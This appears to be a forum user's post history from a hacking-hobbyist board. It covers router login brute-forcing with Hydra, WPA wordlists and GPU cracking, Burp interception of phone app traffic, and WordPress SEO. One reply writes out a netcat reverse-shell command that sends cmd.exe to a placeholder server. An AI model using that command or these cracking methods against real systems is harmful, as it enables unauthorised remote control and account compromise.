i8igmac
-
Posts
939 -
Joined
-
Last visited
-
Days Won
22
Everything posted by i8igmac
-
Help please! Bruteforcing a DLINK DSL2750U ADSL Router with Hydra
i8igmac replied to Pandora Boz's topic in Everything Else
Can you provide tcp stream of hydra single login attempt? The post request and the server response. You might also try using burp as the brute force tool. Try the intruder tab... I have better luck building a brute force from scratch... -
Thank you so much... thats a improvement... how long did this take to generate? And what kind of gpu?
-
its time to make improvements : -) there have been so many recent data breaches that if the information is publicly available, we need to filter threw! Yahoo breach estimated 1 billion users data stolen... target and home depo also come to mind...
-
http://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html http://weakpass.com/lists Some download links here! Post more links plz... Supa-wpa.txt has worked. Well Apologies for my misunderstanding!
-
This is a pre computed hash table... if you took a packet with the ssid of 'HOME-AB01' and encrypted it with 170,000 passwords, you would thin have a pre computed hash table saved to a hard drive... This would take my labtop about 11 seconds to generate, once completed then a lookup is only 1 second... There is a 170,000 password list hashed by 1000' ssid's... There is also 1million password list hashed by 1000 ssid's... I am interested in download links for wpa word list. There has to be a updated version. There have been so many huge data breaches lately...
-
I can provide a few basic examples you could modify. What service login?
-
Netcat Reverse Shell Invisible Payload Fast
i8igmac replied to Dtpk's topic in Classic USB Rubber Ducky
Netcat. The tcp swiss army knife... there is so much you can do with this... You can perform attacks like this with out port forwarding... For example, your web browser can connect to google with out port forwarding. Netcat can do the same `nc google.COM -p 80` Netcat is used like a pipe... shuv data down one end of the pipe and the other side can see it... nc your.server.com -p 88 -b cmd.exe If your webserver or your machine is properly port forward then all should work. Reverse Tcp netcat shell. -
Build the attack your self. Its a lot of fun to learn this stuff.. you can use curl or libs for perl, python and ruby... Learn why a firewall might ip ban you...
-
this may not be the place for this toppic. But I have a idea... There maybe a rigged voting system. I was thinking about creating a online vote booth, with hopes to insure only a single facebook user could submit one vote... If I was to create a online voting system with triple capcha authentication. I could try and spread a link on facebook in all 50 states. (I have a method/function for this) A simple database to store the information... (User-id User-state-location User-vote) What do you guys think.
-
Wavemon example console application. mtr example console application. Im looking to create a webpage that will display the output of several console applications. Wavemon will show wifi information and mtr will show advanced ping information. I hope there is a simple package i can start with
-
You are On point. I pulled some led's, power and reset switch off a old puter... I tested both switchS for Continuity and pressed the button, onlly holds continuity for a moment... both switch seem identical in that aspect... Now im Onto a new problem, it seems bios has a black list for mini pcie wifi devices, my machine wont boot with my Atheros chips Installed. Almost need a new thread for my struggles ill run into. Cheap 12$ small chips Qualoccom Ar9462 Ar5b22... thanks for your reply.
-
Just wanted to add this image of a 10-1 pin... I would think, if I connect 8-7 with a basic toggle switch it should power on? Or even connect the 2 pins with a piece of metal? I should see it light up
-
my Asus thin mini itx SoC Has arived! this is my budget build. I hope to save money by avoiding the purchase of a itx case. so now i have a question about the chassis 10-1 pin connector. This 10-1 pin connector will provide the case a button for power, reset and a running led. can i just grab a toggle switch to power this baby up?
-
That article shows 100 million cars effected by this keyless entry bug... probably more...
-
http://thehackernews.com/2016/08/hack-unlock-car-door.html?m=1 This is a huge bug that I figure would hit the local news channels soon... Set up some cameras... Go the extra mile and plant a gps device in a cheap labtop and wait for it to be stolen
-
How many i7's And how many cores Look for some server motherboards that will accept 4x cpu slots. sounds like alot of fun... I hope you have the funds to put something together...
-
I'm not so sure it matters in the situation. As long as traffic makes it to burp or another machine... I'm looking at this from a pentest situation... if I install a cert on a device, I want to see the traffic in plain text...
-
iptables -t nat -A PREROUTING -p tcp -s 192.168.96.75 –dport 80,443 -j DNAT –to-destination 192.168.96.70:8080 my setup is a home built debian based router with iptables. So running the above with a masquerade command will force the source ip(phone) to the destination ip(labtop) snapchat app was just cut off the data response witch seems to match the description you explained... However, the Facebook app was functional, no errors on the phone... but burp was not showing any data stream but some alerts and warnings that maybe burp suite decided to allow the traffic threw... I should have took a closer look at the traffic... seems like hsts stream(just a guess)
-
I was board this last weekend. I felt like sniffing some data from my android phone. So i installed the burp certificate on my samsung s3, witch forced me to setup a pin or password lock on my phone. If you manualy install custom certs on the android then you are forced to use a pin/password to protect the phone... So, setup some iptable rules to force the traffic on my phone to pass threw a transperint burp suite running on my labtop. I first tested the phone webbrowser and worked very well, no obnoxious certificate errors (as expected)... but when I tried to sniff the snapchat app or facebook app it was a nogo... Any ideas for sniffing the snapchat app or facebook app? Has any one tried? I removed the pin/password from my phone and reconfigured a simple swipe phone unlock. This automaticly deletes the cert I installed from burp...
-
i have just watched a hak5 episode that includes a guy/company (not sure of the name) he has cluster of gpu capable of cracking these 8char passwords in 5 hours or so.... not sure how many video cards, 7970's that cost right now $772.66 each he has invested at the time of this video about $30,000 maybe he can chime in on the conversation... i would like to chat with him... maybe he can be found on irc? and the second part of the video
-
i did install this addon in my search for seo... shortly after i removed... i would fear the most popular addons are at risk... i was given a lot of advice on irc freenode #seo channel... when dealing with a local business it takes time but is easy to build up google rankings by providing good service and getting feedback in the right place's like yelp and such...
-
I like what I see... there is a part of my brain that Will never let this be... on the word list. I have had good success but it could be better... there are a lot of new password dumps that have hit the news... these dumps need to be sorted threw for use with wpa cracking... append the newly unique list to the supa wpa wordlist that already exist online. I also think when you distribute the process across the network the is a bottle neck. I have not tested this with a good switch but I have split the large list to equal portions and upload to each machine... no network bottle neck...
-
I understand the risk in using wordpress. i have plans to prevent google dork hackers and automated exploits. I would think the high ranked plugins are at risk. Yoast is #1 ranked and might be on the rce list
-
I have been asked to build a webpage for a dental office... his goal is to have his page at the top of google when you search for "lakewood dental implants" I come here to. Ask for help with wordpress and search engine optimization... I have seen a few high ranked plugins 'yoast SEO' and "all in one SEO" I have read over some reviews on both plugins but not sure if this is the right path... Any advice for getting a address on google maps and a good start for learning SEO... plz share spme ideas or tutorials
-
maybe if I was retired with funds sitting around... I would first find a affordable video card, setup a big water pump home built radiator water cooling... try to extreme overclock this test rig... I posted above with 2 gaming rigs at 35000 hash's per second will take me 932 days... if I can get this to 30 days I will need a rig that can produce 3500031 hash's per second... that's almost 62 more video cards to accomplish this. Keep in mind, both my gaming machines are not overclocked. If a cheap video card at 35$ can survive a extreme overclock At this point i would know if its even afforably possable.
